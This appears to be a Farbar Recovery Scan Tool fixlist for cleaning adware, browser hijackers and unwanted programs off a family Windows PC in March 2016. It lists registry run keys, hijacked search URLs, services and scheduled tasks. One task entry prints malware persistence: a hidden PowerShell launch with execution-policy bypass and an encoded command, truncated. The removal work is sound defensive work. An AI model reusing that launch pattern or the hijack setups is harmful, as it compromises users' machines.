CreateRestorePoint: 
HKLM-x32\...\Run: [Registry Helper] => "C:\Program Files (x86)\Registry Helper\RegistryHelper.Exe" /boot
HKLM-x32\...\Run: [LGODDFU] =>  blrun
HKLM-x32\...\Run: [SPDriver] => C:\Program Files (x86)\ShopperPro3\JSDriver\1.42.1.10650\jsdrv.exe [2720256 2016-03-13] ()
HKLM-x32\...\Run: [YTDownloader] => C:\Program Files (x86)\YTDownloader\YTDownloader.exe [1991600 2015-10-22] (YTDownloader)
HKU\S-1-5-21-2774599765-3218687334-1828580283-1002\...\Run: [SPDriver] => C:\Program Files (x86)\ShopperPro3\JSDriver\1.42.1.10650\jsdrv.exe [2720256 2016-03-13] ()
HKU\S-1-5-21-2774599765-3218687334-1828580283-1002\...\Run: [YTDownloader] => C:\Program Files (x86)\YTDownloader\YTDownloader.exe [1991600 2015-10-22] (YTDownloader)
HKU\S-1-5-21-2774599765-3218687334-1828580283-1002\...\Run: [SearchModule] => C:\Users\FAMILY\AppData\Local\SearchModule\dblaunch.exe [239104 2016-03-06] ()
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://searchinterneat-a.akamaihd.net/h?eq=U0EeCFZVBB8SRghFcFoAUw8TQxgWdAAMTA0VR1YOeQgJABQVEwcUdAoAAAgSEwQFIk0FA1ADB0VXfVBdFElXTwhwJVhKAlEmRFdoLlZP
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.safesearch.net/?utm_medium=ie&utm_campaign=im&utm_source=im&utm_content=1&utm_term=35365DF7DD1942EC
HKU\S-1-5-21-2774599765-3218687334-1828580283-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://searchinterneat-a.akamaihd.net/h?eq=U0EeCFZVBB8SRghFcFoAUw8TQxgWdAAMTA0VR1YOeQgJABQVEwcUdAoAAAgSEwQFIk0FA1ADB0VXfVBdFElXTwhwJVhKAlEmRFdoLlZP
HKU\S-1-5-21-2774599765-3218687334-1828580283-1002\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://searchinterneat-a.akamaihd.net/h?eq=U0EeCFZVBB8SRghFcFoAUw8TQxgWdAAMTA0VR1YOeQgJABQVEwcUdAoAAAgSEwQFIk0FA1ADB0VXfVBdFElXTwhwJVhKAlEmRFdoLlZP
HKU\S-1-5-21-2774599765-3218687334-1828580283-1002\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.safesearch.net/?utm_medium=ie&utm_campaign=im&utm_source=im&utm_content=1&utm_term=35365DF7DD1942EC
URLSearchHook: HKU\S-1-5-21-2774599765-3218687334-1828580283-1002 - (No Name) - {00000000-6E41-4FD3-8538-502F5495E5FC} - No File
SearchScopes: HKLM -> DefaultScope {4B51C980-C6B0-11E1-9136-AED16088709B} URL = hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfV8IAgFDF1dBbQwMWA1cFVFFIxQBUAgQDFERcg4MUgEQEFYRcR9aFQQTSEcFME0FCFwEURNNfWpdAEsSSWJGInJWDk4=&q={searchTerms}
SearchScopes: HKLM -> OldSearch URL = hxxp://www.safesearch.net/search?q={searchTerms}&utm_medium=ie&utm_campaign=im&utm_source=im&utm_content=1&utm_term=35365DF7DD1942EC
SearchScopes: HKLM -> {4B51C980-C6B0-11E1-9136-AED16088709B} URL = hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfV8IAgFDF1dBbQwMWA1cFVFFIxQBUAgQDFERcg4MUgEQEFYRcR9aFQQTSEcFME0FCFwEURNNfWpdAEsSSWJGInJWDk4=&q={searchTerms}
SearchScopes: HKLM -> {FC0C0170-4EB0-430D-A7F3-939EE7EA1A25} URL = hxxp://www.safesearch.net/search?q={searchTerms}&utm_medium=ie&utm_campaign=im&utm_source=im&utm_content=1&utm_term=35365DF7DD1942EC
SearchScopes: HKLM-x32 -> DefaultScope {4B51C980-C6B0-11E1-9136-AED16088709B} URL = hxxp://www.safesearch.net/search?q={searchTerms}&utm_medium=ie&utm_campaign=im&utm_source=im&utm_content=1&utm_term=35365DF7DD1942EC
SearchScopes: HKLM-x32 -> {4B51C980-C6B0-11E1-9136-AED16088709B} URL = hxxp://www.safesearch.net/search?q={searchTerms}&utm_medium=ie&utm_campaign=im&utm_source=im&utm_content=1&utm_term=35365DF7DD1942EC
SearchScopes: HKU\S-1-5-21-2774599765-3218687334-1828580283-1002 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfV8IAgFDF1dBbQwMWA1cFVFFIxQBUAgQDFERcg4MUgEQEFYRcR9aFQQTSEcFME0FCFwEURNNfWpdAEsSSWJGInJWDk4=&q={searchTerms}
SearchScopes: HKU\S-1-5-21-2774599765-3218687334-1828580283-1002 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfV8IAgFDF1dBbQwMWA1cFVFFIxQBUAgQDFERcg4MUgEQEFYRcR9aFQQTSEcFME0FCFwEURNNfWpdAEsSSWJGInJWDk4=&q={searchTerms}
SearchScopes: HKU\S-1-5-21-2774599765-3218687334-1828580283-1002 -> {4B51C980-C6B0-11E1-9136-AED16088709B} URL = hxxp://www.safesearch.net/search?q={searchTerms}&utm_medium=ie&utm_campaign=im&utm_source=im&utm_content=1&utm_term=35365DF7DD1942EC
SearchScopes: HKU\S-1-5-21-2774599765-3218687334-1828580283-1002 -> {A06B1DC8-F08D-4C87-AD5A-B1196D0EEA29} URL = hxxp://www-searching.com/s.ashx?prd=opensearch&q={searchTerms}&s=G3Izgutbl338BA,278cafab-0fe6-4a7c-916e-833be2a0b3e5,
SearchScopes: HKU\S-1-5-21-2774599765-3218687334-1828580283-1002 -> {FC0C0170-4EB0-430D-A7F3-939EE7EA1A25} URL = hxxp://www.safesearch.net/search?q={searchTerms}&utm_medium=ie&utm_campaign=im&utm_source=im&utm_content=1&utm_term=35365DF7DD1942EC
BHO: Shopper Pro -> {A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C} -> C:\ProgramData\ShopperPro3\ShopperPro364.dll [2016-03-13] ()
BHO-x32: Shopper Pro -> {A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C} -> C:\ProgramData\ShopperPro3\ShopperPro3.dll [2016-03-13] ()
BHO-x32: Primary Color 1.0.0.7 -> {b0a28f54-b08f-4049-a9bf-8d33bd1e9222} -> C:\Program Files (x86)\Primary Color\PrimaryColorbho.dll [2016-03-09] (Primary Color)
BHO-x32: Search Web Know -> {da8dfa05-93a3-4617-8c86-bbfc625f8fa7} -> C:\Program Files (x86)\Search Web Know\Extensions\da8dfa05-93a3-4617-8c86-bbfc625f8fa7.dll [2016-03-18] ()
Toolbar: HKU\S-1-5-21-2774599765-3218687334-1828580283-1002 -> No Name - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} -  No File
FF HKLM-x32\...\Firefox\Extensions: [{C7AE725D-FA5C-4027-BB4C-787EF9F8248A}] - C:\Program Files (x86)\PremierOpinion\firefox
CHR HomePage: Default -> hxxp://www-searching.com/?pid=s&s=G3Izgutbl338BA,278cafab-0fe6-4a7c-916e-833be2a0b3e5,&vp=ch&prd=set_ch
CHR RestoreOnStartup: Default -> "hxxp://searchinterneat-a.akamaihd.net/h?eq=U0EeCFZVBB8SRghFcFoAUw8TQxgWdAAMTA0VR1YOeQgJABQVEwcUdAoAAAgSEwQFIk0FA1oDB0VXfV5bFElXTwhwJVhKAlEmRFdoLlZP"
CHR StartupUrls: Default -> "hxxp://searchinterneat-a.akamaihd.net/h?eq=U0EeCFZVBB8SRghFcFoAUw8TQxgWdAAMTA0VR1YOeQgJABQVEwcUdAoAAAgSEwQFIk0FA1oDB0VXfV5bFElXTwhwJVhKAlEmRFdoLlZP"
CHR DefaultSearchURL: Default -> hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfV8IAgFDF1dBbQwMWA1cFVFFIxQBUAgQDFERcg4MUgEQEFYRcR9aFQQTQkcFME0FBloEURNNfWpdAEsSSWJGInJWDk4=&q={searchTerms}
CHR DefaultSearchKeyword: Default -> searchinterneat-a.akamaihd.net
CHR DefaultNewTabURL: Default -> hxxp://searchinterneat-a.akamaihd.net/t?eq=U0EeFFhaR1oWHFMTIwEKV1sTDAAXeQ0VVV0XQhgacQhZTF1DEwIXcwFZUFpDEBNBNARaAktXUUEeJ1pNER8fHGZGIUtbCW4UQ35NL04=
CHR Extension: (Primary Color) - C:\Users\FAMILY\AppData\Local\Google\Chrome\User Data\Default\Extensions\adoeegiggiebejjakjjpcmcphfjomfcf [2016-03-19] [UpdateUrl: hxxp://wwwgetmyprimaryc-a.akamaihd.net/update/chrome] <==== ATTENTION
CHR Extension: (Search Web Know) - C:\Users\FAMILY\AppData\Local\Google\Chrome\User Data\Default\Extensions\bnmpllcnbecfpaebnjboigkhigfhhbme [2016-03-18] [UpdateUrl: hxxp://cdn.searchwebknow.com/update] <==== ATTENTION
R2 BrsHelper; C:\Program Files (x86)\YTDownloader\BrowserHelperSrv.exe [112560 2015-10-22] ()
R2 brsrv; C:\Users\FAMILY\AppData\Local\brsrv\brsrv.exe [104448 2016-03-06] () [File not signed]
R2 PremierOpinion; C:\Program Files (x86)\PremierOpinion\pmservice.exe [206136 2015-07-21] (VoiceFive, Inc.)
R2 Service Mgr SearchWebKnow; C:\ProgramData\219d5106-5a99-41fd-b942-db6b503b0178\plugincontainer.exe [1408216 2016-03-19] () <==== ATTENTION
R2 SMUpd; C:\Program Files\Common Files\Goobzo\GBUpdate\smu.exe [2460672 2016-03-17] (Search Module Ltd.) [File not signed]
R2 SPBIUpd; C:\Program Files\Common Files\ShopperPro3\spbiu.exe [1224704 2016-03-13] () [File not signed]
R2 Update Mgr SearchWebKnow; C:\Program Files (x86)\Common Files\219d5106-5a99-41fd-b942-db6b503b0178\updater.exe [1271512 2016-03-19] () <==== ATTENTION
S2 Update Primary Color; C:\Program Files (x86)\Primary Color\updatePrimaryColor.exe [664488 2016-03-19] ()
S2 Util Primary Color; C:\Program Files (x86)\Primary Color\bin\utilPrimaryColor.exe [664488 2016-03-19] ()
S2 wbsvc; C:\Program Files\WebBar\wbsvc.exe [28392 2016-03-07] ()
R2 sbmntr; C:\Program Files (x86)\YTDownloader\sbmntr.sys [58528 2015-10-22] (YTDownloader)
R3 SMUpdd; C:\Program Files\Common Files\Goobzo\GBUpdate\smw.sys [43264 2016-03-17] ()
R3 SPBIUpdd; C:\Program Files\Common Files\ShopperPro3\spbiw.sys [43824 2016-03-13] ()
R2 SPDRIVER_1.42.1.10650; C:\Program Files (x86)\ShopperPro3\JSDriver\1.42.1.10650\jsdrv.sys [53048 2016-03-13] ()
R1 {bfca5c75-b8a6-4c3f-a399-5256dde4bfed}Gw64; C:\Windows\System32\drivers\{bfca5c75-b8a6-4c3f-a399-5256dde4bfed}Gw64.sys [48456 2016-03-18] (StdLib)
2016-03-19 10:07 - 2016-03-19 10:08 - 00000000 ____D C:\Users\FAMILY\AppData\Local\{A5D926AB-3667-4A5E-98DC-1C308CE89891}
2016-03-19 09:47 - 2016-03-19 09:48 - 02374144 _____ (Farbar) C:\Users\FAMILY\Downloads\FRST64.exe
2016-03-19 09:37 - 2016-03-19 09:37 - 00098971 _____ C:\Users\FAMILY\SparkTrust PC Cleaner Plus-Log-19-03-16-09-36-07.zip
2016-03-19 08:52 - 2016-03-19 09:41 - 00000000 ____D C:\ProgramData\SparkTrust
2016-03-19 08:52 - 2016-03-19 08:52 - 00000000 ____D C:\Users\FAMILY\AppData\Roaming\SparkTrust
2016-03-19 08:51 - 2016-03-19 08:52 - 11135784 _____ (SparkTrust) C:\Users\FAMILY\Downloads\SparkTrust PC Cleaner Plus Setup_E6F3D806-BF70-445B-B4A3-CFD5FDF9C899_.exe
2016-03-19 07:00 - 2016-03-19 07:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PremierOpinion
2016-03-19 06:58 - 2015-07-21 17:19 - 01084728 _____ (VoiceFive, Inc.) C:\WINDOWS\system32\pmls64.dll
2016-03-19 06:58 - 2015-07-21 17:19 - 00733496 _____ (VoiceFive, Inc.) C:\WINDOWS\SysWOW64\pmls.dll
2016-03-18 21:44 - 2016-03-18 21:44 - 00000000 ____D C:\Users\UpdatusUser\AppData\Local\Google
2016-03-18 21:43 - 2016-03-19 08:26 - 00000298 _____ C:\WINDOWS\Tasks\One System CarePeriod.job
2016-03-18 21:43 - 2016-03-18 22:37 - 00000000 ____D C:\Users\FAMILY\AppData\Local\WebBar
2016-03-18 21:43 - 2016-03-18 21:48 - 00000000 ____D C:\Users\FAMILY\AppData\Roaming\One System Care
2016-03-18 21:43 - 2016-03-18 21:43 - 00003850 _____ C:\WINDOWS\System32\Tasks\WebBarUpdateTask
2016-03-18 21:43 - 2016-03-18 21:43 - 00003688 _____ C:\WINDOWS\System32\Tasks\One System Care Task
2016-03-18 21:43 - 2016-03-18 21:43 - 00003422 _____ C:\WINDOWS\System32\Tasks\One System Care Run Delay
2016-03-18 21:43 - 2016-03-18 21:43 - 00003352 _____ C:\WINDOWS\System32\Tasks\One System Care Monitor
2016-03-18 21:43 - 2016-03-18 21:43 - 00003324 _____ C:\WINDOWS\System32\Tasks\WebBarLaunchTask
2016-03-18 21:43 - 2016-03-18 21:43 - 00002928 _____ C:\WINDOWS\System32\Tasks\One System CarePeriod
2016-03-18 21:43 - 2016-03-18 21:43 - 00001140 _____ C:\Users\Public\Desktop\Launch One System Care.lnk
2016-03-18 21:43 - 2016-03-18 21:43 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\One System Care
2016-03-18 21:43 - 2016-03-18 21:43 - 00000000 ____D C:\ProgramData\49232d2d-6c63-1
2016-03-18 21:43 - 2016-03-18 21:43 - 00000000 ____D C:\ProgramData\49232d2d-3c63-0
2016-03-18 21:43 - 2016-03-18 21:43 - 00000000 ____D C:\Program Files\WebBar
2016-03-18 21:43 - 2016-03-18 21:43 - 00000000 ____D C:\Program Files (x86)\OneSystemCare
2016-03-18 21:42 - 2016-03-19 15:04 - 00000000 ____D C:\Program Files (x86)\PremierOpinion
2016-03-18 21:41 - 2016-03-19 13:41 - 00000000 ____D C:\ProgramData\219d5106-5a99-41fd-b942-db6b503b0178
2016-03-18 21:41 - 2016-03-19 10:36 - 00000000 ____D C:\Program Files (x86)\Search Web Know
2016-03-18 21:41 - 2016-03-19 09:22 - 00002115 _____ C:\Users\FAMILY\Desktop\Hotmail.lnk
2016-03-18 21:41 - 2016-03-18 21:41 - 00003580 _____ C:\WINDOWS\System32\Tasks\IBUpd
2016-03-18 21:41 - 2016-03-18 21:41 - 00003326 _____ C:\WINDOWS\System32\Tasks\IBUpd2
2016-03-18 21:41 - 2016-03-18 21:41 - 00002426 _____ C:\Users\FAMILY\Desktop\BrowserAir.lnk
2016-03-18 21:41 - 2016-03-18 21:41 - 00000000 ____D C:\Users\FAMILY\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\BrowserAir
2016-03-18 21:41 - 2016-03-18 21:41 - 00000000 ____D C:\Users\FAMILY\AppData\Local\SearchModule
2016-03-18 21:41 - 2016-03-18 21:41 - 00000000 ____D C:\Users\FAMILY\AppData\Local\brsrv
2016-03-18 21:40 - 2016-03-18 21:41 - 00000000 ____D C:\Users\FAMILY\AppData\Local\BrowserAir
2016-03-18 21:40 - 2016-03-18 12:24 - 00048456 _____ (StdLib) C:\WINDOWS\system32\Drivers\{bfca5c75-b8a6-4c3f-a399-5256dde4bfed}Gw64.sys
2016-03-18 21:39 - 2016-03-18 21:40 - 00480576 _____ C:\Users\FAMILY\Downloads\adobe_flash_player-92129127.exe
2016-03-18 21:39 - 2016-03-18 21:40 - 00000000 ____D C:\Users\FAMILY\AppData\Local\BrowserHelper
2016-03-18 21:38 - 2016-03-19 08:28 - 00000294 _____ C:\WINDOWS\Tasks\System HealerStartUp.job
2016-03-18 21:38 - 2016-03-19 08:26 - 00000294 _____ C:\WINDOWS\Tasks\System HealerPeriod.job
2016-03-18 21:38 - 2016-03-19 08:26 - 00000000 ____D C:\Program Files (x86)\Primary Color
2016-03-18 21:38 - 2016-03-18 21:43 - 00000000 ____D C:\Users\FAMILY\AppData\Roaming\System Healer
2016-03-18 21:38 - 2016-03-18 21:38 - 00023852 _____ C:\WINDOWS\System32\Tasks\{0A7D0E47-0C0A-0B7F-0A11-0F0A0E0C1178}
2016-03-18 21:38 - 2016-03-18 21:38 - 00004464 _____ C:\WINDOWS\System32\Tasks\ShopperPro3
2016-03-18 21:38 - 2016-03-18 21:38 - 00004416 _____ C:\WINDOWS\System32\Tasks\SPBIW_UpdateTask_Time_323732333831323538362d454a2a415034412a4a6c575a
2016-03-18 21:38 - 2016-03-18 21:38 - 00004414 _____ C:\WINDOWS\System32\Tasks\SMW_UpdateTask_Time_323732333831323538362d454a2a415034412a4a6c575a
2016-03-18 21:38 - 2016-03-18 21:38 - 00004016 _____ C:\WINDOWS\System32\Tasks\YTDownloaderUpd
2016-03-18 21:38 - 2016-03-18 21:38 - 00003688 _____ C:\WINDOWS\System32\Tasks\YTDownloader
2016-03-18 21:38 - 2016-03-18 21:38 - 00003684 _____ C:\WINDOWS\System32\Tasks\System Healer Task
2016-03-18 21:38 - 2016-03-18 21:38 - 00003596 _____ C:\WINDOWS\System32\Tasks\SPDriver
2016-03-18 21:38 - 2016-03-18 21:38 - 00003412 _____ C:\WINDOWS\System32\Tasks\SystemHealer Run Delay
2016-03-18 21:38 - 2016-03-18 21:38 - 00003342 _____ C:\WINDOWS\System32\Tasks\SystemHealer Monitor
2016-03-18 21:38 - 2016-03-18 21:38 - 00002920 _____ C:\WINDOWS\System32\Tasks\System HealerPeriod
2016-03-18 21:38 - 2016-03-18 21:38 - 00002626 _____ C:\WINDOWS\System32\Tasks\System HealerStartUp
2016-03-18 21:38 - 2016-03-18 21:38 - 00002022 _____ C:\Users\FAMILY\Desktop\YTDownloader.lnk
2016-03-18 21:38 - 2016-03-18 21:38 - 00001128 _____ C:\Users\Public\Desktop\Launch System Healer.lnk
2016-03-18 21:38 - 2016-03-18 21:38 - 00000000 ____D C:\Users\FAMILY\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\YTDownloader
2016-03-18 21:38 - 2016-03-18 21:38 - 00000000 ____D C:\Users\Public\Documents\ShopperPro3
2016-03-18 21:38 - 2016-03-18 21:38 - 00000000 ____D C:\ProgramData\ShopperPro3
2016-03-18 21:38 - 2016-03-18 21:38 - 00000000 ____D C:\ProgramData\SearchModule
2016-03-18 21:38 - 2016-03-18 21:38 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Healer
2016-03-18 21:38 - 2016-03-18 21:38 - 00000000 ____D C:\ProgramData\87d4b359-6c95-1
2016-03-18 21:38 - 2016-03-18 21:38 - 00000000 ____D C:\ProgramData\87d4b359-41b3-0
2016-03-18 21:38 - 2016-03-18 21:38 - 00000000 ____D C:\Program Files\Common Files\ShopperPro3
2016-03-18 21:38 - 2016-03-18 21:38 - 00000000 ____D C:\Program Files\Common Files\Goobzo
2016-03-18 21:38 - 2016-03-18 21:38 - 00000000 ____D C:\Program Files (x86)\YTDownloader
2016-03-18 21:38 - 2016-03-18 21:38 - 00000000 ____D C:\Program Files (x86)\SystemHealer
2016-03-18 21:37 - 2016-03-18 21:38 - 00000000 ____D C:\Program Files (x86)\ShopperPro3
2016-03-18 21:37 - 2016-03-18 21:37 - 00187904 _____ C:\WINDOWS\rsrcs.dll
2016-03-18 21:37 - 2016-03-18 21:37 - 00003682 _____ C:\WINDOWS\System32\Tasks\ShopperProJSUpd
2016-03-18 21:37 - 2016-03-18 21:37 - 00000000 ____D C:\Users\FAMILY\AppData\Local\Setup Wizard
2016-03-18 21:37 - 2016-03-18 21:37 - 00000000 ____D C:\ProgramData\SoftMedia
2016-03-18 21:37 - 2016-03-18 21:37 - 00000000 ____D C:\Program Files (x86)\SoftMedia
2016-03-18 21:34 - 2016-03-18 21:35 - 00689768 _____ C:\Users\FAMILY\Downloads\Setup.exe
2016-03-17 22:03 - 2016-03-17 22:03 - 01035736 _____ ( ) C:\Users\FAMILY\Downloads\FlashPlayerPro.exe
2016-03-17 11:00 - 2016-03-17 11:00 - 00000000 ____D C:\Users\FAMILY\AppData\Local\{3A8B57C3-1388-424F-892A-A7989FFB83E9}
2016-03-16 03:37 - 2016-03-16 13:20 - 00000000 ____D C:\Users\FAMILY\AppData\Local\{FC678396-2C29-4B63-919F-016CF8D8C544}
2016-03-15 11:31 - 2016-03-15 11:32 - 00000000 ____D C:\Users\FAMILY\AppData\Local\{7BC9D032-BB74-4A54-9F42-5031DB07FA39}
2016-03-13 19:56 - 2016-03-13 19:57 - 00000000 ____D C:\Users\FAMILY\AppData\Local\{8B32A798-574F-4191-8E63-29B15862C3E4}
2016-03-12 20:38 - 2016-03-12 20:38 - 00000000 ____D C:\Users\FAMILY\AppData\Local\{2075560F-C5F5-43B9-9B4B-D351C4D0114C}
2016-03-11 20:15 - 2016-03-11 20:15 - 00000000 ____D C:\Users\FAMILY\AppData\Local\{D051106C-CFBB-4097-808C-018B33D9339E}
2016-03-06 20:20 - 2016-03-06 20:21 - 00000000 ____D C:\Users\FAMILY\AppData\Local\{8C656ABB-D4CC-43A4-BF04-30774B72D2A7}
2016-03-06 08:19 - 2016-03-06 08:19 - 00000000 ____D C:\Users\FAMILY\AppData\Local\{2F2C7842-F93F-4355-A450-7C4534C2F74A}
2016-03-04 20:00 - 2016-03-04 20:00 - 00000000 ____D C:\Users\FAMILY\AppData\Local\{6D6BE7B4-A4CD-4DDB-8DA6-8E834783672A}
2016-03-04 08:00 - 2016-03-04 08:00 - 00000000 ____D C:\Users\FAMILY\AppData\Local\{E74F5156-2120-4CC8-BDE8-E3A05410ABEC}
2016-03-03 14:32 - 2016-03-03 14:32 - 00000000 ____D C:\Users\FAMILY\AppData\Local\{E3DE45D6-39B4-4F0B-A444-492AE5F3B19B}
2016-03-02 12:16 - 2016-03-02 12:16 - 00000000 ____D C:\Users\FAMILY\AppData\Local\{F78ECBB2-6309-45E2-807F-294500728105}
2016-02-28 21:35 - 2016-02-28 21:36 - 00000000 ____D C:\Users\FAMILY\AppData\Local\{01359F7D-497D-4E15-8130-DBD883D522B8}
2016-02-28 09:35 - 2016-02-28 09:35 - 00000000 ____D C:\Users\FAMILY\AppData\Local\{53EEFCC1-E53C-4DAA-98BD-10821C39B60A}
2016-02-27 21:34 - 2016-02-27 21:34 - 00000000 ____D C:\Users\FAMILY\AppData\Local\{9345F8B4-B4F1-4304-9510-FFC5D04831EA}
2016-02-23 18:53 - 2016-02-27 09:34 - 00000000 ____D C:\Users\FAMILY\AppData\Local\{906F93F9-44E4-4ABC-B479-CE3C5A765449}
2016-02-22 08:40 - 2016-02-22 08:40 - 00000000 ____D C:\Users\FAMILY\AppData\Local\{CF64107B-FC5B-490C-9359-2EAFBA1C89ED}
Task: {03016FFF-6F21-4267-853D-9DAB71D38A2B} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {0E33F4C2-463A-45A1-B51B-386A14865DED} - System32\Tasks\WebBarUpdateTask => C:\Program Files\WebBar\wbsvc.exe [2016-03-07] () <==== ATTENTION
Task: {1811C626-5A3C-4E9C-9FB1-6F74E2A4A1A3} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {192EA388-3346-42C7-B900-0474B7343F21} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {2CB9B203-726D-475D-A439-809CD63C2418} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {381F786B-B520-4AF6-9127-B09CE2DD36A1} - System32\Tasks\ShopperProJSUpd => C:\Program Files (x86)\ShopperPro3\updater.exe [2016-03-13] (Goobzo) <==== ATTENTION
Task: {3A1A7413-1639-41FD-B034-7EBBAB235169} - System32\Tasks\YTDownloader => C:\Program Files (x86)\YTDownloader\YTDownloader.exe [2015-10-22] (YTDownloader) <==== ATTENTION
Task: {3A1E8671-AD59-4273-9EAF-BDC4BDE609B8} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {4052BF58-01E0-4281-A086-2B04CF49BBF1} - System32\Tasks\System HealerPeriod => C:\Program Files (x86)\SystemHealer\SystemHealer.exe [2016-03-15] ()
Task: {45606527-716E-489B-91F6-03980CBF99FE} - System32\Tasks\One System Care Monitor => C:\Program Files (x86)\OneSystemCare\CleanupConsole.exe [2016-03-15] () <==== ATTENTION
Task: {456F07E5-2DF2-48E4-91A0-62F18BE52403} - System32\Tasks\System HealerStartUp => C:\Program Files (x86)\SystemHealer\SystemHealer.exe [2016-03-15] ()
Task: {4F6B583E-88CA-48AC-92E5-414ABEB54A23} - System32\Tasks\ShopperPro3 => C:\Program Files (x86)\ShopperPro3\ShopperPro3.exe [2016-03-13] (Goobzo LTD) <==== ATTENTION
Task: {4F9DF11E-C5A7-4C0B-828E-45C7E1423E8B} - System32\Tasks\IBUpd => C:\Users\FAMILY\AppData\Local\BrowserAir\47.0.0.5\updater.exe [2016-02-14] () <==== ATTENTION
Task: {51C10DAB-B894-4716-8E75-E32DB45B2030} - System32\Tasks\IBUpd2 => C:\Users\FAMILY\AppData\Local\BrowserAir\47.0.0.5\updater.exe [2016-02-14] () <==== ATTENTION
Task: {5D0125A3-917F-49AC-8224-D2B66AA1C3BB} - System32\Tasks\{0A7D0E47-0C0A-0B7F-0A11-0F0A0E0C1178} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand IAA7ADsAOwAgADsAIAA7ACAAOwA7ADsAOwAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBzAHQAbwBwACIAOwAkAHMAYwA9ACIAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAiADsAJABXAGEAcgBuAGkAbgBnAFAAcgBlAGYAZQByAGUA (the data entry has 9688 more characters).
Task: {67E3D420-5B61-4BD5-955E-808DEEE23A20} - System32\Tasks\SPDriver => C:\Program Files (x86)\ShopperPro3\JSDriver\1.42.1.10650\jsdrv.exe [2016-03-13] () <==== ATTENTION
Task: {689153DE-E555-4A6F-BDAC-0229A43A6D08} - System32\Tasks\SystemHealer Monitor => C:\Program Files (x86)\SystemHealer\HealerConsole.exe [2016-03-15] ()
Task: {6A9AEF73-E366-4B84-BA5F-662C8A76EEF5} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {7167878C-2073-4943-97AA-FE6914A30D20} - System32\Tasks\SPBIW_UpdateTask_Time_323732333831323538362d454a2a415034412a4a6c575a => Wscript.exe //B "C:\ProgramData\ShopperPro3\spbihe.js" spbiu.exe /invoke /f:check_services /l:0 <==== ATTENTION
Task: {755E496D-BD8D-4372-B348-EC8C032C7202} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {78148991-BE7C-451F-AD1E-E8D83D63D3A7} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {7AE60F6B-ABED-44DC-8E74-6EF2BB71870F} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime -> No File <==== ATTENTION
Task: {83BA0469-7E24-4680-9486-64CD93A7F7A3} - System32\Tasks\SystemHealer Run Delay => C:\Program Files (x86)\SystemHealer\SystemHealer.exe [2016-03-15] ()
Task: {953989AB-679E-4994-8742-CC02E3555904} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime -> No File <==== ATTENTION
Task: {9AEE213D-98C5-4287-BB5F-17F06172B55D} - System32\Tasks\SMW_UpdateTask_Time_323732333831323538362d454a2a415034412a4a6c575a => Wscript.exe //B "C:\ProgramData\SearchModule\smhe.js" smu.exe /invoke /f:check_services /l:0 <==== ATTENTION
Task: {A1A75FB4-850D-4C19-95D0-1F3C3D441631} - System32\Tasks\One System Care Run Delay => C:\Program Files (x86)\OneSystemCare\OneSystemCare.exe [2016-03-15] () <==== ATTENTION
Task: {AD3000D1-3AF5-44C4-825A-F5F1EDE936B6} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {BB038315-32CB-4C1D-B912-3CB0A51B24C4} - System32\Tasks\One System CarePeriod => C:\Program Files (x86)\OneSystemCare\OneSystemCare.exe [2016-03-15] () <==== ATTENTION
Task: {BC654DE0-FD27-4519-96AE-2A1E6E0BE557} - System32\Tasks\YTDownloaderUpd => C:\Program Files (x86)\YTDownloader\updater.exe [2015-10-22] (Goobzo) <==== ATTENTION
Task: {BE803180-2024-4EF1-BF8C-72972D1162BE} - System32\Tasks\One System Care Task => C:\Program Files (x86)\OneSystemCare\SystemConsole.exe [2016-03-15] () <==== ATTENTION
Task: {F73C70C6-6079-47D2-9C52-98A774707E27} - System32\Tasks\WebBarLaunchTask => C:\Program Files\WebBar\wbsvc.exe [2016-03-07] () <==== ATTENTION
Task: {FDC46E98-8D63-448D-96DC-5EA845E8BE0A} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: C:\WINDOWS\Tasks\One System CarePeriod.job =>  <==== ATTENTION
Task: C:\WINDOWS\Tasks\System HealerPeriod.job => 
Task: C:\WINDOWS\Tasks\System HealerStartUp.job => C:\Program Files (x86)\SystemHealer\SystemHealer.exe
